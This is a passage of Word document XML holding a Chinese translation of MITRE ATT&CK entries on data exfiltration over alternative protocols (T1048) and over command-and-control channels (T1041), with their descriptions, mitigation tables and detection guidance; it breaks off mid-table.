    <w:p w14:paraId="7CF4BAC3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ADD35C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00A270AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析不常见数据流的网络数据（例如，客户端发送的数据明显多于从服务器接收的数据）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A270AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A270AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果进程维持长连接，在此期间它始终发送固定大小的数据包，或者进程打开连接并定期发送固定大小的数据包，则可能正在执行聚合数据传输。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A270AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A270AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用通常不具有网络通信或从未见过的网络的过程是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A270AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A270AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容以检测不遵循正在使用的端口的预期协议行为的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016DEF2E" w14:textId="694B2FE5" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="005A5E91" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>备用协议上的数据渗漏</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127383" w:rsidRPr="00A65911" w14:paraId="49E1717F" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="717D742D" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1048</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74DED297" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：数据渗漏</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2341D3FB" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F6E1808" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户接口</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，进程监控，网络进程使用，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络抓包</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络协议分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D9CA833" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DED7654" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68CBEE13" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7279400B" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据渗漏是通过与主</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议或通道不同的协议执行的。数据可能会从主</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器发送到备用网络位置。备用协议包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP/S</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或某些其他网络协议。通道可能包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务，例如云存储。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309ACA7A" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="7756"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127383" w:rsidRPr="00127383" w14:paraId="170F1177" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3D567420" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00127383" w:rsidRDefault="00127383" w:rsidP="00127383">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00127383">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="38B1C63E" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00127383" w:rsidRDefault="00127383" w:rsidP="00127383">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00127383">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127383" w:rsidRPr="00A65911" w14:paraId="66E47CFB" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="381DCD02" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId249" w:history="1">
              <w:r w:rsidR="00127383" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络流量过滤</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A4EAA34" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>强制代理并为</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DNS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等服务使用专用服务器，并且只允许这些系统通过各自的端口</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>协议进行通信，而不是通过网络中的所有系统进行通信。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127383" w:rsidRPr="00A65911" w14:paraId="0C8F617A" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="669B9F32" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId250" w:history="1">
              <w:r w:rsidR="00127383" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B371E39" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络签名来识别</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>攻击者</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基础</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>软件及恶意软件流量的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来缓解网络级别活动的影响。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127383" w:rsidRPr="00A65911" w14:paraId="68195845" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="739B4708" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId251" w:history="1">
              <w:r w:rsidR="00127383" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络分区</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2700E336" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请遵循网络防火墙配置的最佳实践，仅允许必要的端口和流量进入和退出网络。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F5C3E1D" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C7995C" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF2C11D" w14:textId="22194469" w:rsidR="00A0413E" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析网络数据中不常见的数据流（例如，客户端发送的数据明显多于从服务器接收的数据）。如果以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不和网络通信的进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用了网络，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从未</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>见过的进程，则是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容来检测未遵循所使用端口的预期协议而</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的通信。</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E" w:rsidRPr="00AC5912">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通道渗漏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB8ECD" w14:textId="4283D37A" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidR="00803353">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通道的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据渗漏</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127383" w:rsidRPr="00A65911" w14:paraId="119236A4" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E6217E7" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="743BD30E" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：数据渗漏</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="361CADA2" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="053DE8E9" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>接口，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="331CE9F1" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:lastRenderedPageBreak/>
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77479E56" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3146EC8C" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08ED8ED4" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据渗漏是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通道执行的。使用与</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信相同的协议将数据编码到正常通信通道中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D17EF" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127383" w:rsidRPr="00127383" w14:paraId="11AA6DB0" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6BDBF926" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00127383" w:rsidRDefault="00127383" w:rsidP="00127383">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00127383">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
